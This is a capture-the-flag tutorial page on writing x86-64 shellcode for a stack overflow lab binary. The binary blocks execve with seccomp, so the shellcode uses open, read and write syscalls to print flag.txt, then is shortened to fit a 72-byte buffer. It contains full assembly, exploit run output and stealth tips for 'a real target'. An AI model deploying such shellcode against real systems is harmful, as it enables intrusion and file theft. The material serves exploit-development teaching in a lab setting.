BINEX: Stack Exploits · IronForgeCyber

Writing Shellcode

This challenge is very similar to Leaked Shellcode with a major difference. For this challenge, we'll practice writing our own shellcode for when Shellstorm doesn't have an exploit to do what we need.

First, we'll use Leaked Shellcode's exploit against this binary. When we run it:

[*] '/ironforge/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process '/ironforge/chall': pid 94425
[*] buf: 0x7ffc92c37f40
[*] Switching to interactive mode
What do you want to write there?
Thank you!
[*] Got EOF while reading in interactive
$
[*] Interrupted
[*] Process '/ironforge/chall' stopped with exit code -31 (SIGSYS) (pid 94425)

We get SIGSYS. Using man 7 signal we can see what this error means:

SIGSYS       P2001      Core    Bad system call (SVr4);
                                       see also seccomp(2)

It mentions checking man 2 seccomp, which uses SIGSYS as its error for using disallowed system calls.

We see via ldd (or the source code) that seccomp is used.

libseccomp.so.2 => /lib/x86_64-linux-gnu/libseccomp.so.2 (0x00007fd56a622000)

Because of this, you may need to install seccomp for this binary to run. This can be done with:

sudo apt-get install libseccomp-dev

seccomp alllows for the disabling of certain system calls. In this case, it's disabled execve and execveat, so our old exploit no longer works. We'll need to write our own.

Drafting Shellcode

First, we need to decide what the shellcode should do. Since we just need the flag.txt file, we can simply do that. In C, we would do something like:

FILE *fp = fopen("flag.txt", "r");
fgets(buffer, sizeof(buffer), fp);
puts(buffer);

These functions are libc functions. We can find these inside libc and call them directly, but this is difficult. We become subject to ASLR and knowing the base address of libc. Instead, we can use system calls to do this. This would look something like:

int fd = open("flag.txt", O_RDONLY);
read(fd, buffer, sizeof(buffer));
write(fd, buffer, sizeof(buffer));

Using the x64 syscall table we can get these system calls, arguments, and register values. x64 system calls use the same register scheme as regular functions, with the addition of rax being used for the system call number.

First, we must open the file. open has the following signature:

int open(const char *pathname, int flags);

We don't have our own place to store memory. We must use the stack. This becomes problematic because our instructions are also stored on the stack. Too much pushing and you may overwrite your own instructions. This is especially critical in smaller spaces.

open takes a char* for the pathname, meaning we need an address that points to flag.txt. Since it's not already in the binary, we must introduce it into the shellcode. We do this by pushing it onto the stack and saving rsp.

mov rbx, 0x7478742e67616c66
push 0x0
push rbx
mov rdi, rsp

Why push 0x0?

We need this string to be null-terminated, otherwise open will keep reading until it finds one. Since flag.txt is exactly 8 characters, we need an extra instruction to push it.

You can pretty easily write a script that converts a string into this push instruction using Python.

Then, we can load the other registers and call syscall:

; open(flag.txt, NULL, NULL)
mov al, 0x2
mov rbx, 0x7478742e67616c66
push 0x0
push rbx
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
syscall

We'll need to store the return of this (rax) because it contains the file descriptor of the open socket. This is where Caller vs. Callee Registers comes into play. We cannot use a caller-saved register because we can't guarantee it's security. So, I chose r10 to secure my file descriptor.

mov r10, rax

Then, we need to read bytes from the flag. We aren't told its length, so we will do this one in loops. We'll read a few bytes, write a few bytes, then check if we're at the end.

First, establish the buffer we'll write to:

push qword 0x0

Then, label our loop:

.loop:

Reading bytes. We'll use read which has the signature:

ssize_t read(int fd, void buf[.count], size_t count);

This is pretty simple to do:

; read(fd, rsp, 0x8)
mov rdi, r10
xor rax, rax
mov rsi, rsp
mov rdx, 0x8
syscall

Writing bytes. We'll get the return of the read to decide the number of bytes to write.

; write(fd, stdout, 0x20)
mov rdx, rax
mov rdi, 1
mov rax, 1
syscall

Finally, we must check if we're done. We can compare this return to 0x8 to see if we wrote 0x8 bytes.

cmp rax, 0x8
jl .done
jmp .loop

.done doesn't need anything under it because at this point, we'll have our flag.

Understanding Our Assumptions

I said a few things during that explanation that are worthy of explaining further.

Why use `r10` at all?

We need r10 because the write system call will clobber rdi since it needs to change it to the stdout file descriptor. Therefore, the flag.txt file descriptor must be stored elsewhere so we can load it each run.

Why didn't we just always write 8 bytes?

This is not an obvious choice that required a bit of forethought. In the end, we need to compare the number of bytes read from the file descriptor (the return of read) to 0x8 (the intended read size). If we read less than this, we reached the end of the file.

If we chose to always write 0x8 bytes, write will always return 0x8 and our comparison would never work. Therefore, we choose to use read's return to write that many bytes and use write's return to check if we're at the end.

Another way to do this is to move the check between the read and write calls. We would need to change the check to only check for read returning 0, otherwise we'll miss a few bytes in the final write.

Why don't we need anything in .done?

In this scenario, we don't need to do anything in .done because we'll already have the flag. What we'll notice at the end, however, is that the program will crash. This is because it'll run out of valid instructions.

If we were attempting this against a real target and wanted to remain inconspicuous, we would do a few things depending on the situation:

Close the file descriptor. This is super easy:

mov rdi, r10
mov rax, 0x3 ; sys_close
syscall

Return execution state. This is not so easy. In a program like this, where we know nothing is after, we can call sys_exit to exit the program.

xor rdi, rdi
mov rax, 0x3c
syscall

However, if we stole execution and the program was expected to do more (such as a reactor loop), we would want to return execution. This might involve storing the instruction and stack pointers using a trampoline. Coming soon we'll have a course on shellcoding that will cover this in more depth.

Running Our Shellcode

First, we need to compile.

nasm -f bin -o sc.bin sc.asm

Then, we can read this file into our exploit:

with open("sc.bin", "rb") as f:
	sc = f.read()

This replaces our old sc. This challenge has a slightly larger buffer, so we'll adjust the ljust to 0x58 bytes.

When we run it:

[*] '/ironforge/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process '/ironforge/chall': pid 128923
[*] buf: 0x7ffe9aea2be0
[*] Switching to interactive mode
What do you want to write there?
Thank you!
IFC{PL4C[*] Got EOF while reading in interactive
$
[*] Process '/ironforge/chall' stopped with exit code -11 (SIGSEGV) (pid 128923)
[*] Got EOF while sending in interactive

It started to work but died! What we'll notice is that our shellcode doesn't fit the buffer:

$ wc -c sc.bin
76 sc.bin

Our buffer was only 72 big! We need to make it smaller.

Shortening Shellcode

As discussed in Assembly Instructions, instructions have various lengths. Most notably is Register Extension (REX) which adds size for the 64-bit instructions. When applicable, we'll attempt to shorten instructions.

We can shorten every rax-related instruction by zeroing out the register at the beginning and only ever using the least-significant byte. We can do this on two assumptions:

We don't use any system calls that have large numbers or return large numbers. We don't -- open returns a file descriptor, and read and write return a number <= 0x8.
The functions we use don't error and put negative values in rax. This can be a bold assumption but more often that not works in shellcoding. We wouldn't really do this if we were writing a program from scratch.

Then, we can change rdx in read and write to dl knowing that we zeroed out rdx before the open syscall. We also know that rdi only holds one byte because it holds a file descriptor, so we can change that, too.

When shortening all the registers, our assembly becomes:

org 0
bits 64

section .text
global _start

_start:
    ; Clear rax
    xor rax, rax

    ; open(flag.txt, NULL, NULL)
    mov al, 0x2
    mov rbx, 0x7478742e67616c66
    push 0x0
    push rbx
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    syscall
    mov r10d, eax

    ; Buffer for writing
    push qword 0x0

.loop:

    ; rax = read(fd, rsp, 0x8)
    mov edi, r10d
    mov al, 0
    mov rsi, rsp
    mov dl, 0x8
    syscall

    ; write(fd, stdout, rax)
    mov dl, al
    mov dil, 1
    mov al, 1
    syscall

    cmp al, 0x8
    jl .done

    jmp .loop

.done:

This shortens our assembly to 61 bytes, which fits into the buffer.

If we run this, we get:

*] '/ironforge/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process '/ironforge/chall': pid 134755
[*] buf: 0x7ffcdf38c300
[*] Switching to interactive mode
What do you want to write there?
Thank you!
IFC{PL4C3H0LD3R_FL4G_H3R3!}
[*] Got EOF while reading in interactive
$
[*] Process '/ironforge/chall' stopped with exit code -11 (SIGSEGV) (pid 134755)
[*] Got EOF while sending in interactive

This yields our entire flag!

IronForgeCyber

Log In

sc-write.tar.gz

Writing Shellcode

Drafting Shellcode

Understanding Our Assumptions

Why use `r10` at all?

Why didn't we just always write 8 bytes?

Why don't we need anything in .done?

Running Our Shellcode

Shortening Shellcode

sc-write.tar.gz

Writing Shellcode

Drafting Shellcode

Understanding Our Assumptions

Why use r10 at all?

Why didn't we just always write 8 bytes?

Why don't we need anything in .done?

Running Our Shellcode

Shortening Shellcode

Why use `r10` at all?